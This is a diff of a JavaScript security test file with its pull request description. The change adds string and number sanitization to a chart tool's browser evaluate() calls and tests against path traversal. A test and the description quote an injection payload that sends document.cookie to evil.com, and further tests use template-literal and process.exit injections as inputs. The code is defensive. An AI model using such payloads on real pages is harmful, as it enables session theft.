+
+  it('wraps in double quotes so single quotes are safe', () => {
+    const result = safeString("test'injection");
+    // JSON.stringify wraps in double quotes — single quotes inside are harmless
+    assert.equal(result, '"test\'injection"');
+    // The key: this produces "test'injection" which in JS is a valid double-quoted string
+    // An attacker can't break out of double quotes with single quotes
+  });
+
+  it('escapes double quotes', () => {
+    const result = safeString('test"injection');
+    assert.equal(result, '"test\\"injection"');
+  });
+
+  it('neutralizes template literals by wrapping in double quotes', () => {
+    const result = safeString('${alert(1)}');
+    // JSON.stringify produces: "${alert(1)}" — a double-quoted string literal
+    // Template literals only execute inside backticks, not double quotes
+    const parsed = JSON.parse(result);
+    assert.equal(parsed, '${alert(1)}', 'template literal preserved as literal text');
+  });
+
+  it('escapes backslashes', () => {
+    const result = safeString('test\\injection');
+    assert.equal(result, '"test\\\\injection"');
+  });
+
+  it('escapes newlines and control chars', () => {
+    const result = safeString('line1\nline2\r\ttab');
+    assert.ok(!result.includes('\n'), 'newline must be escaped');
+    assert.ok(result.includes('\\n'), 'newline escaped as \\n');
+  });
+
+  it('handles empty string', () => {
+    assert.equal(safeString(''), '""');
+  });
+
+  it('coerces non-strings to strings', () => {
+    assert.equal(safeString(123), '"123"');
+    assert.equal(safeString(null), '"null"');
+    assert.equal(safeString(undefined), '"undefined"');
+  });
+
+  it('prevents the classic CDP injection payload', () => {
+    const payload = "'); fetch('https://evil.com/steal?c=' + document.cookie); ('";
+    const result = safeString(payload);
+    // Result should be a single valid JSON string — no code breakout
+    const parsed = JSON.parse(result);
+    assert.equal(parsed, payload, 'payload round-trips through JSON.parse');
+  });
+
+  it('prevents template literal injection', () => {
+    const payload = '`; process.exit(); `';
+    const result = safeString(payload);
+    const parsed = JSON.parse(result);
+    assert.equal(parsed, payload);
+  });
+});
+
+// ── requireFinite() ──────────────────────────────────────────────────────
+
+describe('requireFinite() — numeric validation', () => {
+  it('passes finite numbers through', () => {
+    assert.equal(requireFinite(42, 'test'), 42);
+    assert.equal(requireFinite(3.14, 'test'), 3.14);
+    assert.equal(requireFinite(-100, 'test'), -100);
+    assert.equal(requireFinite(0, 'test'), 0);
+  });
+
+  it('coerces numeric strings', () => {
+    assert.equal(requireFinite('42', 'test'), 42);
+    assert.equal(requireFinite('3.14', 'test'), 3.14);
+  });
+
+  it('rejects NaN', () => {
+    assert.throws(() => requireFinite(NaN, 'price'), /price must be a finite number/);
+  });
+
+  it('rejects Infinity', () => {
+    assert.throws(() => requireFinite(Infinity, 'time'), /time must be a finite number/);
+    assert.throws(() => requireFinite(-Infinity, 'time'), /time must be a finite number/);
+  });
+
+  it('rejects non-numeric strings', () => {
+    assert.throws(() => requireFinite('abc', 'value'), /value must be a finite number/);
+  });
+
+  it('coerces null to 0 (Number(null) === 0)', () => {
+    assert.equal(requireFinite(null, 'x'), 0);
+  });
+
+  it('rejects undefined (Number(undefined) === NaN)', () => {
+    assert.throws(() => requireFinite(undefined, 'x'), /x must be a finite number/);
+  });
+
+  it('includes the bad value in error message', () => {
+    assert.throws(() => requireFinite('oops', 'field'), /got: oops/);
+  });
+});
+
+// ── Source-level audit: no raw interpolation in evaluate() calls ─────────
+
+describe('source audit — no unsafe interpolation patterns', () => {
+  const CORE_DIR = new URL('../src/core/', import.meta.url).pathname;
+  const coreFiles = readdirSync(CORE_DIR).filter(f => f.endsWith('.js'));
+
+  for (const file of coreFiles) {
+    it(`${file} has no .replace(/'/g, "\\\\'") patterns`, () => {
+      const source = readFileSync(join(CORE_DIR, file), 'utf8');
+      assert.ok(
+        !source.includes(".replace(/'/g,"),
+        `${file} still uses manual quote escaping — use safeString() instead`,
+      );
+    });
+  }
+
+  // Check that evaluate() calls with user input use safeString
+  const VULNERABLE_PATTERNS = [
+    // Raw string interpolation into single quotes: '${var}'
+    /evaluate\([^)]*'\$\{(?!CHART_API|CWC|rp|apiPath|colPath|CHART_COLLECTION)/,
+  ];
+
+  for (const file of coreFiles) {
+    it(`${file} has no raw user input in evaluate() string literals`, () => {
+      const source = readFileSync(join(CORE_DIR, file), 'utf8');
+      for (const pattern of VULNERABLE_PATTERNS) {
+        assert.ok(
+          !pattern.test(source),
+          `${file} has raw interpolation in evaluate() — use safeString()`,
+        );
+      }
+    });
+  }
+});
+
+// ── Path traversal prevention ────────────────────────────────────────────
+
+describe('path traversal prevention', () => {
+  it('capture.js strips path separators from filename', () => {
+    const source = readFileSync(new URL('../src/core/capture.js', import.meta.url), 'utf8');
+    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"), 'capture.js strips path separators');
+  });
+
+  it('batch.js strips path separators from filename', () => {
+    const source = readFileSync(new URL('../src/core/batch.js', import.meta.url), 'utf8');
+    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"), 'batch.js strips path separators');
+  });
+});


### PR DESCRIPTION
## Summary

All `evaluate()` calls that interpolate user input are now sanitized via `safeString()` (JSON.stringify-based) and `requireFinite()`. This prevents:

- **Code injection** via crafted strings that break out of JS string literals in CDP evaluate() calls (e.g., `'); fetch('https://evil.com/steal?c=' + document.cookie); ('`)
- **Cloud state corruption** via NaN/Infinity in coordinates, chart types, or other persisted values
- **Path traversal** via `../` in screenshot filenames

### Modules fixed

| Module | What changed |
|--------|-------------|
| `connection.js` | Added `safeString()`, `requireFinite()` exports |
| `alerts.js` | Price input sanitized |
| `batch.js` | Symbol/timeframe sanitized, filename path traversal blocked |
| `capture.js` | Filename path traversal blocked |
| `chart.js` | Symbol/timeframe/indicator/entity_id sanitized, chart type 0-9 validated, visible range validated |
| `data.js` | study_filter/entity_id/symbol sanitized |
| `drawing.js` | Shape name/entity_id sanitized, point coordinates validated with requireFinite |
| `indicators.js` | entity_id sanitized (replaces incomplete `.replace(/'/g)`) |
| `pane.js` | Layout/symbol sanitized (replaces incomplete `.replace(/'/g)`) |

### Why `safeString()` over manual escaping

The old pattern `.replace(/'/g, "\\'")` only escapes single quotes. It doesn't handle: backslashes (allowing `\'` escape), backticks, template literals (`${...}`), newlines, or unicode escapes. `JSON.stringify()` handles all of these correctly.

## Test plan

- [x] 52 new sanitization tests (safeString, requireFinite, source audit of all 16 core files, path traversal)
- [x] 120 total tests pass (52 sanitization + 39 replay + 29 existing)
- [x] Source-level audit confirms zero `.replace(/'/g` patterns remain in any core file
- [x] Source-level audit confirms zero raw `'${var}'` interpolation in evaluate() calls
- [ ] Manual: `chart_set_symbol` with normal symbols works
- [ ] Manual: `draw_shape` with valid coordinates works

Related: PRs #21 and #22 by @KarmicP identified the same vulnerability class. This PR applies the same approach (`safeString`/`requireFinite`) but built on top of our already-merged fixes (#20, #29) to avoid conflicts.

🤖 Generated with [Claude Code](https://claude.com/claude-code)